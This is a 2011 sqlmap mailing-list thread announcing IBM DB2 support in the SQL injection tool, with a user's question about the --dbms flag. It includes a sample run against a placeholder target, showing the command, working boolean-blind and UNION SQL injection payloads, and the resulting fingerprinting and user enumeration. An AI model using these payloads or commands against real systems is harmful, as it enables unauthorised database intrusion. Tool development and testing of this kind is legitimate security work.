The generic tests are always tested for. Regardless of the DBMS identified or --dbms switch provided.
Bernardo 2011/8/10 Andres Tarascó Acuña <atara...@gmail.com>: > Hi, > Is the "--dbms=db2" flag still unsupported ? I have tried it however > the checked payloads were: > [20:43:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' > [20:44:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' > [20:44:13] [INFO] testing 'Generic UNION query with Microsoft Access (%00) > comment (NULL) - 1 to 10 columns' > Im not sure if this is currently a bug or just the expected result :? > Thanks. > Andres > 2011/7/6 Bernardo Damele A. G. <bernardo.dam...@gmail.com> >> >> Hi, >> >> Update on IBM DB2 support: payload for time-based has been added[1] >> last week as well as support for direct connection (-d switch). >> >> [1] https://twitter.com/#!/sqlmap/status/85659702565937152 >> >> >> On 25 June 2011 11:04, Bernardo Damele A. G. <bernardo.dam...@gmail.com> >> wrote: >> > Hi, >> > >> > The long awaited IBM DB2 support has been implemented in sqlmap. The >> > patch has been provided by Sebastian Bittig of r-tec IT Systeme GmbH >> > and merged in sqlmap repository after some tweaking by us. It is very >> > stable for both DB2 8.x and 9.x branches. >> > The patch includes support to fingerprint and enumerate data on IBM >> > DB2 via boolean-based blind SQL injection and UNION query SQL >> > injection. Hopefully, soon someone will come up with a payload for >> > time-based and error-based techniques too. Support for direct >> > connection to the DBMS (-d switch) will be implemented soon as well. >> > >> > Thank you Sebastian and the rest of the team at r-tec for your patch >> > and support! >> > >> > Sample run against an IBM DB2 9.7 test environment: >> > --8<-- >> > $ python sqlmap.py -u http://TARGET/page.php?id=1 -f -b --current-user >> > >> > sqlmap/1.0-dev (r4182) - automatic SQL injection and database >> > takeover tool >> > http://sqlmap.sourceforge.net >> > >> > [!] legal disclaimer: usage of sqlmap for attacking targets without >> > prior mutual consent is illegal. It is the end user's responsibility >> > to obey all applicable local, state and federal laws. Authors assume >> > no liability and are not responsible for any misuse or damage caused >> > by this program >> > >> > [*] starting at 10:56:21 >> > >> > [10:56:21] [INFO] using >> > >> > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/TARGET/session' >> > as session file >> > [10:56:21] [INFO] testing connection to the target url >> > [10:56:23] [INFO] heuristics detected web page charset 'ascii' >> > [10:56:23] [INFO] testing if the url is stable, wait a few seconds >> > [10:56:25] [INFO] url is stable >> > [10:56:25] [INFO] testing if GET parameter 'id' is dynamic >> > [10:56:26] [INFO] confirming that GET parameter 'id' is dynamic >> > [10:56:26] [INFO] GET parameter 'id' is dynamic >> > [10:56:27] [INFO] heuristic test shows that GET parameter 'id' might >> > be injectable (possible DBMS: DB2) >> > [10:56:27] [INFO] testing sql injection on GET parameter 'id' >> > [10:56:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING >> > clause' >> > [10:56:32] [INFO] GET parameter 'id' is 'AND boolean-based blind - >> > WHERE or HAVING clause' injectable >> > parsed error message(s) showed that the back-end DBMS could be DB2. Do >> > you want to skip test payloads specific for other DBMSes? [Y/n] >> > [10:56:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' >> > [10:56:49] [INFO] target url appears to be UNION injectable with 1 >> > columns >> > [10:56:51] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - >> > 1 to 10 columns' injectable >> > GET parameter 'id' is vulnerable. Do you want to keep testing the >> > others? [y/N] >> > sqlmap identified the following injection points with a total of 21 >> > HTTP(s) requests: >> > --- >> > Place: GET >> > Parameter: id >> > Type: boolean-based blind >> > Title: AND boolean-based blind - WHERE or HAVING clause >> > Payload: id=1' AND 7118=7118 AND 'Skhh'='Skhh >> > >> > Type: UNION query >> > Title: Generic UNION query (NULL) - 1 to 10 columns >> > Payload: id=1' UNION ALL SELECT >> > >> > CHR(58)||CHR(110)||CHR(114)||CHR(114)||CHR(58)||CHR(90)||CHR(103)||CHR(65)||CHR(88)||CHR(66)||CHR(109)||CHR(69)||CHR(74)||CHR(77)||CHR(117)||CHR(58)||CHR(101)||CHR(113)||CHR(108)||CHR(58) >> > FROM SYSIBM.SYSDUMMY1-- AND 'QrLM'='QrLM >> > --- >> > >> > [10:58:58] [INFO] testing IBM DB2 >> > [10:58:59] [INFO] confirming IBM DB2 >> > [10:59:12] [INFO] the back-end DBMS is IBM DB2 >> > web server operating system: Windows >> > web application technology: PHP 5.3.5, Apache 2.2.17 >> > back-end DBMS: active fingerprint: IBM DB2 9.7 >> > html error message fingerprint: DB2 >> > [10:59:12] [INFO] fetching banner >> > banner: 'DB2 v9.7.400.501' >> > >> > [10:59:13] [INFO] fetching current user >> > current user: 'TEST' >> > --8<-- >> > >> > Bernardo >> > >> > >> > -- >> > Bernardo Damele A. G. >> > >> > E-mail / Jabber: bernardo.damele (at) gmail.com >> > Mobile: +447788962949 (UK 07788962949) >> > PGP Key ID: Unavailable >> > >> >> >> >> -- >> Bernardo Damele A. G. >> >> E-mail / Jabber: bernardo.damele (at) gmail.com >> Mobile: +447788962949 (UK 07788962949) >> PGP Key ID: Unavailable >> >> >> ------------------------------------------------------------------------------ >> All of the data generated in your IT infrastructure is seriously valuable. >> Why? It contains a definitive record of application performance, security >> threats, fraudulent activity, and more. Splunk takes this data and makes >> sense of it. IT sense. And common sense. >> http://p.sf.net/sfu/splunk-d2d-c2 >> _______________________________________________ >> sqlmap-users mailing list >> sqlmap-users@lists.sourceforge.net >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable ------------------------------------------------------------------------------ uberSVN's rich system and user administration capabilities and model configuration take the hassle out of deploying and managing Subversion and the tools developers use with it. Learn more about uberSVN and get a free download at: http://p.sf.net/sfu/wandisco-dev2dev _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
